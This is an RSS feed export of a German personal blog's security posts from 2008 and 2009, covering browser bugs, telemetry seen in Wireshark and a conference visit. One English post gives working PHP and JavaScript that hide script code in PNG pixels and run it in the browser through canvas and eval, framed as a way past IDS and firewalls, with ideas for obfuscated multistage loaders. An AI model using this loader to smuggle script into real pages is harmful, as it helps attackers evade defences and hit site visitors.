<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>MrMarco bloggt nicht &#187; Security</title>
	<atom:link href="http://www.highantdev.de/blog/category/sicherheit/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.highantdev.de/blog</link>
	<description>Ein Blog über meine Projekte, mich und was sonst noch so existiert</description>
	<lastBuildDate>Sun, 05 Feb 2012 20:08:04 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Buffed.de und die Fehlermeldungen&#8230; AUA</title>
		<link>http://www.highantdev.de/blog/2009/04/15/buffedde-und-die-fehlermeldungen-aua/</link>
		<comments>http://www.highantdev.de/blog/2009/04/15/buffedde-und-die-fehlermeldungen-aua/#comments</comments>
		<pubDate>Wed, 15 Apr 2009 11:24:32 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[Allgemeines]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.highantdev.de/blog/?p=398</guid>
		<description><![CDATA[Es kann ja mal passieren, dass ein Server überlastet ist und Fehlermeldungen auswirft. Aber sooo detailiert muss es dann doch nicht sein. Die nächste Steigerung ist dann die Anzeige vom Admincontext&#8230; Buffed.de EPIC Fail]]></description>
			<content:encoded><![CDATA[<p>Es kann ja mal passieren, dass ein Server überlastet ist und Fehlermeldungen auswirft.</p>
<p>Aber sooo detailiert muss es dann doch nicht sein.</p>
<p>Die nächste Steigerung ist dann die Anzeige vom Admincontext&#8230;</p>
<p><a href="http://images.highantdev.de/Blog/Buffed_EPIC_Fail.png">Buffed.de EPIC Fail</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.highantdev.de/blog/2009/04/15/buffedde-und-die-fehlermeldungen-aua/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Canvas isn&#8217;t your friend!</title>
		<link>http://www.highantdev.de/blog/2009/02/08/canvas-isnt-your-friend/</link>
		<comments>http://www.highantdev.de/blog/2009/02/08/canvas-isnt-your-friend/#comments</comments>
		<pubDate>Sun, 08 Feb 2009 18:03:05 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[Programmieren]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.highantdev.de/blog/?p=394</guid>
		<description><![CDATA[Today, i have to write in english to get this to more readers. At first&#8230; i don&#8217;t know if this is new, but if it is, then it will be interesting to see, for what it will be used&#8230; Canvas is not very well known. First introduced by Apple and today implemented in browsers like [...]]]></description>
			<content:encoded><![CDATA[<p>Today, i have to write in english to get this to more readers. </p>
<p>At first&#8230; i don&#8217;t know if this is new, but if it is, then it will be interesting to see, for what it will be used&#8230; </p>
<p><a href="http://en.wikipedia.org/wiki/Canvas_(HTML_element)" target="_blank">Canvas</a> is not very well known. First introduced by Apple and today implemented in browsers like Safari, Opera and Firefox. </p>
<p>For most people, it is only known for generating pictures and 3D Animations. But you can missuse it for bypassing ids, firewalls and so on&#8230; </p>
<p>I&#8217;m not good at explaining thing, but i will try it <img src='http://www.highantdev.de/blog/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  </p>
<p>For our example, we don&#8217;t obfuscate anything! </p>
<p>At first we have to know something about png files. Every pixel is build up from 4 Bytes. </p>
<p>Red, Green, Blue and the Alphachannel. To make it easier, we will only use Red, Green and Blue to store data in it. </p>
<p>The sideeffect of the not used Alphachannel is, that every forth byte, there is something useless in it and your code has some lowlevel obfuscating <img src='http://www.highantdev.de/blog/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  </p>
<p>At first, we need a code to generate the image which contains the malicious code. </p>
<p>Let&#8217;s call it <strong>badpicture.php</strong> </p>
<div style="margin-left: 20px; background-color: #cfcfcf">
<pre>&lt;?php
// Figure it out by yourself <img src='http://www.highantdev.de/blog/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />
$strExploit = 'alert(&quot;xss&quot;);//';

$lngX = 0;
$lngY = 0;

// Make it big enough for your code...
$im = imagecreate(256, 5);

// Now here starts the interesting part
for ($lngPos = 0; $lngPos &lt; strlen($strExploit); $lngPos+=3)
{
  $strByte1 = substr ($strExploit, $lngPos, 1);
  $strByte2 = substr ($strExploit, $lngPos+1, 1);
  $strByte3 = substr ($strExploit, $lngPos+2, 1);

  $objColor = ImageColorAllocate ($im, ord($strByte1), ord($strByte2), ord($strByte3));

  imagesetpixel($im, $lngX, $lngY, $objColor);

  $lngX++;

  if ($lngX &gt;= 128)
  {
    $lngX = 0;
    $lngY++;
  }
}

// And now we send it to the browser
header (&quot;Content-type: image/png&quot;);
imagepng($im); // output the stream directly
imagedestroy($im);
?&gt;</pre>
</div>
<p>Ok, Step one is done. What we now need, is a loader. For better reading, i have formated it and put the code in to a html document. </p>
<p></p>
<div style="margin-left: 20px; background-color: #cfcfcf">
<pre>&lt;html&gt;
&lt;body&gt;
Nothing here to read...

&lt;script&gt;
var c=document.createElement(&quot;canvas&quot;);
g=c.getContext(&quot;2d&quot;);
i=new Image();
i.src=&quot;http://domain.tld/badpicture.php&quot;;
i.onload=function() {
  g.drawImage(this,0,0);
  o=g.getImageData(0,0,256,5).data;
  eval(&quot;d=String.fromCharCode(&quot;+o+&quot;).replace(/ÿ/g,'')&quot;);
  eval(d);
}
&lt;/script&gt;

&lt;/body&gt;
&lt;/html&gt;</pre>
</div>
<p>That&#8217;s all ! </p>
<p>To extend this idea more, think about <a href="http://en.wikipedia.org/wiki/Steganography" target="_blank">Steganography</a>, Obfuscating the loader, Multistage Loaders, pre generated pictures with the correct file extension, PNG Compression&#8230; </p>
<p>Think about the attack vectors&#8230; generate a new entry in a wiki with legal content, with a normal picture (normal vor human eyes) and refer to this picture using tinyurl&#8230; </p>
<p>A short note has to be placed&#8230; Opera is using a <strong>Same URI Policy</strong>, so you have to do more, than only to generate a picture and place it somewhere. There are ways around it. </p>
<p>And remember&#8230; Canvas is part of the HTML 5 specification.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.highantdev.de/blog/2009/02/08/canvas-isnt-your-friend/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WTF? What&#8217;s this popping up in my browser?</title>
		<link>http://www.highantdev.de/blog/2009/02/06/wtf-whats-this-popping-up-in-my-browser/</link>
		<comments>http://www.highantdev.de/blog/2009/02/06/wtf-whats-this-popping-up-in-my-browser/#comments</comments>
		<pubDate>Fri, 06 Feb 2009 15:09:06 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[Programmieren]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.highantdev.de/blog/?p=391</guid>
		<description><![CDATA[Something to think about: Canvas Example So take a look at it, figure out how it works. In two days, i will post an explanating of it and how this can be a problem for you. Btw&#8230; It works only on firefox, opera and safari (as far as i know), and there are no alert [...]]]></description>
			<content:encoded><![CDATA[<p>Something to think about:</p>
<p><a href="http://highantdev.de/fft/test4.htm" target="_blank">Canvas Example</a></p>
<p>So take a look at it, figure out how it works.</p>
<p>In two days, i will post an explanating of it and how this can be a problem for you.</p>
<p>Btw&#8230; It works only on firefox, opera and safari (as far as i know), and there are no alert and no xss Text inside <img src='http://www.highantdev.de/blog/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  </p>
]]></content:encoded>
			<wfw:commentRss>http://www.highantdev.de/blog/2009/02/06/wtf-whats-this-popping-up-in-my-browser/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DeepSec IDSC 2008</title>
		<link>http://www.highantdev.de/blog/2008/11/12/deepsec-idsc-2008/</link>
		<comments>http://www.highantdev.de/blog/2008/11/12/deepsec-idsc-2008/#comments</comments>
		<pubDate>Wed, 12 Nov 2008 21:58:09 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[Allgemeines]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.highantdev.de/blog/?p=349</guid>
		<description><![CDATA[Wien&#8230; eine schöne Stadt und im Moment führe ich mir die Vorträge auf der diesjährigen DeepSec zugute. Ich bin echt gespannt auf den Workshop The Exploit Laboratory von Saumil Udayan Shah. Die Kollege reden in den höchsten Tönen von ihm und ich bin echt neugierig darauf, was er so auf Lager hat. Und heute sind [...]]]></description>
			<content:encoded><![CDATA[<p><a href="https://deepsec.net/"><img src="http://images.highantdev.de/Blog/deepsec2008.jpg" alt="DeepSec IDSC 2008"  style="padding-right:20px;float:left;"/></a> Wien&#8230; eine schöne Stadt und im Moment führe ich mir die Vorträge auf der diesjährigen <a href="https://deepsec.net/">DeepSec</a> zugute.</p>
<p>Ich bin echt gespannt auf den Workshop <em>The Exploit Laboratory</em> von <a href="http://saumil.net/">Saumil Udayan Shah</a>. Die Kollege reden in den höchsten Tönen von ihm und ich bin echt neugierig darauf, was er so auf Lager hat.</p>
<p>Und heute sind die ersten zwei Tage auch schon vorbei und ich muß sagen&#8230; Wenn einer Ahnung hat, dann Saumil.</p>
<p>Ich kann im Moment die DeepSec jeden nur wärmstens ans Herzen legen, der sich für Sicherheit interessiert oder der das Thema zum Beruf hat.</p>
<p>Wenn man dann Abends noch die Chance hat, sich mal zu einigen dazu zu setzen und zuhört&#8230;</p>
<p>Um einen guten Kumpel von mir zu zitieren: &#8220;LALALALALA&#8230; Meine Welt ist schön&#8230; ich höre nichts&#8230; LALALALALALA&#8221; <img src='http://www.highantdev.de/blog/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.highantdev.de/blog/2008/11/12/deepsec-idsc-2008/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Google Chrome und window.close()&#8230; *TILT*</title>
		<link>http://www.highantdev.de/blog/2008/09/28/google-chrome-und-windowclose-tilt/</link>
		<comments>http://www.highantdev.de/blog/2008/09/28/google-chrome-und-windowclose-tilt/#comments</comments>
		<pubDate>Sun, 28 Sep 2008 19:27:42 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[Allgemeines]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.highantdev.de/blog/?p=340</guid>
		<description><![CDATA[So langsam fällt mir schon kein Kommentar mehr dazu ein&#8230; Diesmal semmelt Google Chrome bei einem einfachen window.close() ab. Quelle: milw0rm &#8211; Google Chrome Window Object Suppressing Remote Denial of Service Ist laut der Beschreibung ein Designfehler. Naja&#8230; wofür auch einen sicheren Browser erstellen&#8230; langt doch wenn man die Daten der User bekommt&#8230; Btw&#8230; ALL [...]]]></description>
			<content:encoded><![CDATA[<p>So langsam fällt mir schon kein Kommentar mehr dazu ein&#8230;</p>
<p>Diesmal semmelt <a href="http://www.google.de/chrome">Google Chrome</a> bei einem einfachen <em>window.close()</em> ab.</p>
<p>Quelle: <a href="http://www.milw0rm.com/exploits/6609">milw0rm &#8211; Google Chrome Window Object Suppressing Remote Denial of Service</a></p>
<p>Ist laut der Beschreibung ein Designfehler.</p>
<p>Naja&#8230; wofür auch einen sicheren Browser erstellen&#8230; langt doch wenn man die Daten der User bekommt&#8230;</p>
<p>Btw&#8230;</p>
<p><strong>ALL YOUR DATA BELONGS TO US</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.highantdev.de/blog/2008/09/28/google-chrome-und-windowclose-tilt/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Google Chrome DOS per Carriage Return</title>
		<link>http://www.highantdev.de/blog/2008/09/25/google-chrome-dos-per-carriage-return/</link>
		<comments>http://www.highantdev.de/blog/2008/09/25/google-chrome-dos-per-carriage-return/#comments</comments>
		<pubDate>Thu, 25 Sep 2008 04:52:21 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[Allgemeines]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.highantdev.de/blog/?p=336</guid>
		<description><![CDATA[Und wieder ein Problem in Google Chrome. Ein DOS per Carriage Return&#8230; Guggst du hier Und wer zu bequem ist&#8230; Fazit&#8230; Finger weg von dem Browser!]]></description>
			<content:encoded><![CDATA[<p>Und wieder ein Problem in <a href="http://www.google.de/chrome">Google Chrome</a>.</p>
<p>Ein DOS per Carriage Return&#8230;</p>
<p>Guggst du <a href="http://www.milw0rm.com/exploits/6554">hier</a></p>
<p>Und wer zu bequem ist&#8230;</p>
<p><img src="http://images.highantdev.de/Blog/Chrome_Carriage_Return_DOS.png" width="247" height="115" alt="Google Chrome Carriage Return DOS"/></p>
<p>Fazit&#8230; Finger weg von dem Browser!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.highantdev.de/blog/2008/09/25/google-chrome-dos-per-carriage-return/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Microsoft möchte gerne mehr über diese Software erfahren&#8230; WTF?</title>
		<link>http://www.highantdev.de/blog/2008/09/23/microsoft-mochte-gerne-mehr-uber-diese-software-erfahren-wtf/</link>
		<comments>http://www.highantdev.de/blog/2008/09/23/microsoft-mochte-gerne-mehr-uber-diese-software-erfahren-wtf/#comments</comments>
		<pubDate>Tue, 23 Sep 2008 06:25:50 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[Allgemeines]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.highantdev.de/blog/?p=329</guid>
		<description><![CDATA[Nach dem Update einer Installierten Software, kam plötzlich der Windows-Defender um die Ecke und warf mir dieses Popup an den Kopf. Bevor ich hier auf &#8220;Informationen senden&#8221; geklickt habe, warf ich schnell noch Wireshark im Hintergrund an. Eines Vorweg&#8230; Microsoft hat nichts mitgeschickt, was die Maschine direkt identifizieren kann. Jedenfalls nichts, was man direkt sehen [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://images.highantdev.de/Blog/Windows_Defender_Meldung.png" style="padding-right:20px;float:left;"/> Nach dem Update einer Installierten Software, kam plötzlich der <a href="http://www.microsoft.com/windows/products/winfamily/defender/default.mspx">Windows-Defender</a> um die Ecke und warf mir dieses Popup an den Kopf.</p>
<p>Bevor ich hier auf &#8220;Informationen senden&#8221; geklickt habe, warf ich schnell noch <a href="http://www.wireshark.org/">Wireshark</a> im Hintergrund an.</p>
<p>Eines Vorweg&#8230; Microsoft hat nichts mitgeschickt, was die Maschine direkt identifizieren kann. Jedenfalls nichts, was man direkt sehen kann.</p>
<p>Das Problem an der Analyse ist, dass die als Antwort gesendeten Daten per SSL und verschlüsselt zurück kommen. Da kann ich halt nichts großartig rausfiltern.</p>
<p>Hier kurz mal der GET-Request, der rausgeht:</p>
<p><strong>/StageOne/Generic/AVSubmit/WinDefend/1_1_3903_0/unspecified/1_43_537_0/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx.htm?LCID=1031&#038;OS=6.0.6001.2.00010300.1.0.3.18000&#038;VID=Micro-Star%20Int&#8217;l%20Co.,Ltd.</strong></p>
<p>Die hier enthaltenen Daten sind das Gebietsschema Deutsch (LCID), der Mainboardhersteller Microstar/MSI (VID) und verwendete OS (Vista) mit einem sehr detailierten Versionsstring.</p>
<p>Der <strong>xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx</strong> Abschnitt in der URL war vorher eine GUID, welche ich bewußt entfernt habe. <img src='http://www.highantdev.de/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Die Antwort kam nach dem GET-Request zuerst als Cleartext und danach folgten dann per SSL Übertragene Datenpakete.</p>
<p><font color="blue">
<ul><small>
<pre>HTTP/1.1
User-Agent: MSDW
Host: watson.microsoft.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Content-Length: 45
Content-Type: text/html
Last-Modified: Sun, 21 Sep 2008 22:12:35 GMT
Accept-Ranges: bytes
ETag: "bfa9db26371cc91:13b9"
X-Powered-By: ASP.NET
Date: Mon, 22 Sep 2008 21:49:07 GMT

Bucket=336285644
BucketTable=5
Response=1</pre>
<p></small></ul>
<p></font></p>
<p>Bevor sich jemand wundert, wofür ETag steht&#8230; Guggst du <a href="http://de.wikipedia.org/wiki/HTTP_ETag">hier</a>.</p>
<p>Die per SSL übertragenen Datenpakete kamen übrigens von hier:</p>
<p><strong>spynet2.microsoft.com</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.highantdev.de/blog/2008/09/23/microsoft-mochte-gerne-mehr-uber-diese-software-erfahren-wtf/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Google, hier Chrome&#8230; Der User tippt da was&#8230;</title>
		<link>http://www.highantdev.de/blog/2008/09/17/google-hier-chrome-der-user-tippt-da-was/</link>
		<comments>http://www.highantdev.de/blog/2008/09/17/google-hier-chrome-der-user-tippt-da-was/#comments</comments>
		<pubDate>Wed, 17 Sep 2008 13:47:55 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[Allgemeines]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.highantdev.de/blog/?p=284</guid>
		<description><![CDATA[Bei meiner Analyse von Google Chrome ist mir aufgefallen, dass er bei der Eingabe einer URL, laufend Daten nach Hause schickt und auf jede dieser Anfragen auch eine Antwort bekommt. Als neugieriger Mensch, habe ich mir das Log von Wireshark angesehen und Gerätselt, was da so alles als Antwort zurück kommt. HTTP/1.1 200 OK Content-Type: [...]]]></description>
			<content:encoded><![CDATA[<p>Bei meiner Analyse von <a href="http://www.google.com/chrome/">Google Chrome</a> ist mir aufgefallen, dass er bei der Eingabe einer URL, laufend Daten nach <a href="http://www.google.com">Hause</a> schickt und auf jede dieser Anfragen auch eine Antwort bekommt.</p>
<p><a href="http://images.highantdev.de/Blog/Google_Chrome_Wireshark_Capture.png"><img src="http://images.highantdev.de/Blog/Google_Chrome_Wireshark_Capture_small.png" width="324" height="240" alt="Google Chrome - Wireshark Capture" style="padding-right:20px;float:left;"/></a></p>
<p>Als neugieriger Mensch, habe ich mir das <a href="">Log</a> von <a href="http://www.wireshark.org/">Wireshark</a> angesehen und Gerätselt, was da so alles als Antwort zurück kommt.</p>
<p><font color="blue">
<ul><small>
<pre>HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Expires: Wed, 17 Sep 2008 13:17:51 GMT
Content-Encoding: gzip
Date: Wed, 17 Sep 2008 12:17:51 GMT
Server: Auto-Completion Server
Cache-Control: private, x-gzip-ok=""
Content-Length: 179
Connection: keep-alive</pre>
<p></small></ul>
<p></font></p>
<p>Die Folgedaten waren logischerweise dann gepackt.</p>
<p>Da ich die GET-Url hatte, packte ich noch was davor und schickte es mal manuell ab:</p>
<ul><i>http://google.de/complete/search?client=chrome&#038;output=chrome&#038;hl=de&#038;q=www.heise.de</i></ul>
<p>Und das kam als Antwort:</p>
<ul><strong>["www.heise.de",["http://www.heise.de/tp/r4/artikel/5/5263/1.html","www.heise.de ct"],["How NSA access was built into Windows","162,000 Ergebnisse"],[],{&#8220;google:suggesttype&#8221;:["NAVIGATION","QUERY"]}]</strong></ul>
<p>Um das Ganze zu verifizieren, habe ich noch einen <a href="http://www.west-wind.com/WebLog/posts/102969.aspx">gefundenen C# Code</a> ein wenig angepaßt und bekam bei der Ausführung das gleiche Ergebnis.</p>
<p>Das Ganze mal ein wenig aufbereitet zur besseren Ansicht:</p>
<ul>
<pre>[
  "www.heise.de"
  [
    "http://www.heise.de/tp/r4/artikel/5/5263/1.html" "www.heise.de ct"
  ]

  [
    "How NSA access was built into Windows" "162.000 Ergebnisse"
  ]

  [  ]

  {"google:suggesttype":["NAVIGATION" "QUERY"]}
]</pre>
</ul>
<p>Sieht schon fast wie eine XML Struktur aus <img src='http://www.highantdev.de/blog/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>Die letzte Zeile mit <i>{&#8220;google:suggesttype&#8221;:["NAVIGATION" "QUERY"]}</i> hat mein Interesse geweckt. Ich werde da mal nachschauen, was noch so alles möglich ist.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.highantdev.de/blog/2008/09/17/google-hier-chrome-der-user-tippt-da-was/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Microsoft will drei neue Sicherheitskonzepte veröffentlichen *Update*</title>
		<link>http://www.highantdev.de/blog/2008/09/17/microsoft-will-drei-neue-sicherheitskonzepte-veroffentlichen/</link>
		<comments>http://www.highantdev.de/blog/2008/09/17/microsoft-will-drei-neue-sicherheitskonzepte-veroffentlichen/#comments</comments>
		<pubDate>Wed, 17 Sep 2008 05:13:00 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[Allgemeines]]></category>
		<category><![CDATA[Programmieren]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.highantdev.de/blog/?p=274</guid>
		<description><![CDATA[Microsoft geht einen weiteren Schritt in Richtung sicherer Software, wie man hier und insbesondere hier lesen kann. Grundlage des Ganzen ist ein von Microsoft erstelltes Secure Development Lifecycle (SDL) Optimization Model, nicht zu verwechseln mit Simple DirectMedia Layer (SDL), welches meiner Meinung nach als Ergänzung zu den Best Practices zu sehen ist. Natürlich wird es [...]]]></description>
			<content:encoded><![CDATA[<p>Microsoft geht einen weiteren Schritt in Richtung sicherer Software, wie man <a href="http://www.securityfocus.com/brief/820">hier</a> und insbesondere <a href="http://msdn.microsoft.com/en-us/security/cc967276.aspx">hier</a> lesen kann.</p>
<p>Grundlage des Ganzen ist ein von Microsoft erstelltes Secure Development Lifecycle (SDL) Optimization Model, nicht zu verwechseln mit <a href="http://libsdl.org/">Simple DirectMedia Layer (SDL)</a>, welches meiner Meinung nach als Ergänzung zu den <a href="http://www.microsoft.com/mspress/books/8198.aspx">Best Practices</a> zu sehen ist.</p>
<p>Natürlich wird es auch wieder die Möglichkeit geben, über ein Zertifizierungsprogramm eines dieser netten Dokumente zu erhalten, welche einige zum Zimmertapezieren verwenden. <img src='http://www.highantdev.de/blog/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  Nicht das so ein Zertifikat vom Können des Besitzers zeugen würde&#8230; auswendig lernen kann jeder <img src='http://www.highantdev.de/blog/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
<p>Verfügbar wird das Ganze ab November sein. Ich bin echt mal gespannt, was Microsoft sich da so alles ausgedacht hat. Fakt ist, dass sie das Problem von Sicherheitsrisiken durch Fremdsoftware angehen wollen.</p>
<p>Lobenswert! Da können sich die OpenSource Frickler mal eine dicke Scheibe von Abschneiden. <img src='http://www.highantdev.de/blog/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p><strong>Update</strong></p>
<p>Eines der schon <a href="http://msdn.microsoft.com/en-us/security/cc421514.aspx">verfügbaren Tools</a> kann man sich <a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=29a6d444-9954-41f3-9666-3688417b5e08&#038;displaylang=en">hier</a> im Einsatz ansehen, oder <a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=59888078-9DAF-4E96-B7D1-944703479451&#038;displaylang=en">hier</a> herunter laden.</p>
<p><a href="http://images.highantdev.de/Blog/Threat_Analysis_and_Modeling_Launchpad.png""><img src="http://images.highantdev.de/Blog/Threat_Analysis_and_Modeling_Launchpad_small.png" width="331" height="240" alt="Threat Analysis and Modeling Launchpad"/></a></p>
<p><a href="http://images.highantdev.de/Blog/Threat_Analysis_and_Modeling_Mainwindow.png"><img src="http://images.highantdev.de/Blog/Threat_Analysis_and_Modeling_Mainwindow_small.png" width="344" height="240" alt="Threat Analysis and Modeling Mainwindows"/></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.highantdev.de/blog/2008/09/17/microsoft-will-drei-neue-sicherheitskonzepte-veroffentlichen/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Give me all your money&#8230; &#8220;System Crash&#8221; :)</title>
		<link>http://www.highantdev.de/blog/2008/09/08/give-me-all-your-money-system-crash/</link>
		<comments>http://www.highantdev.de/blog/2008/09/08/give-me-all-your-money-system-crash/#comments</comments>
		<pubDate>Mon, 08 Sep 2008 20:32:40 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[Allgemeines]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.highantdev.de/blog/?p=271</guid>
		<description><![CDATA[Was man alles so sieht, wenn man mit offenen Augen durch die Stadt läuft&#8230; Btw&#8230; der Automat hatte in den letzten Tagen schon häufiger Probleme gehabt. Wäre mir auch nie aufgefallen, wenn ich nicht hätte Geld holen wollen und er auf dem Weg liegt.]]></description>
			<content:encoded><![CDATA[<p>Was man alles so sieht, wenn man mit offenen Augen durch die Stadt läuft&#8230;</p>
<p><img src="http://images.highantdev.de/Blog/BankAutomat_1.jpg" width="640" height="480" alt="Bankautomat mit Error"/></p>
<p><img src="http://images.highantdev.de/Blog/BankAutomat_2.jpg" width="640" height="480" alt="Bankautomat mit Error"/></p>
<p>Btw&#8230; der Automat hatte in den letzten Tagen schon häufiger Probleme gehabt. Wäre mir auch nie aufgefallen, wenn ich nicht hätte Geld holen wollen und er auf dem Weg liegt.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.highantdev.de/blog/2008/09/08/give-me-all-your-money-system-crash/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

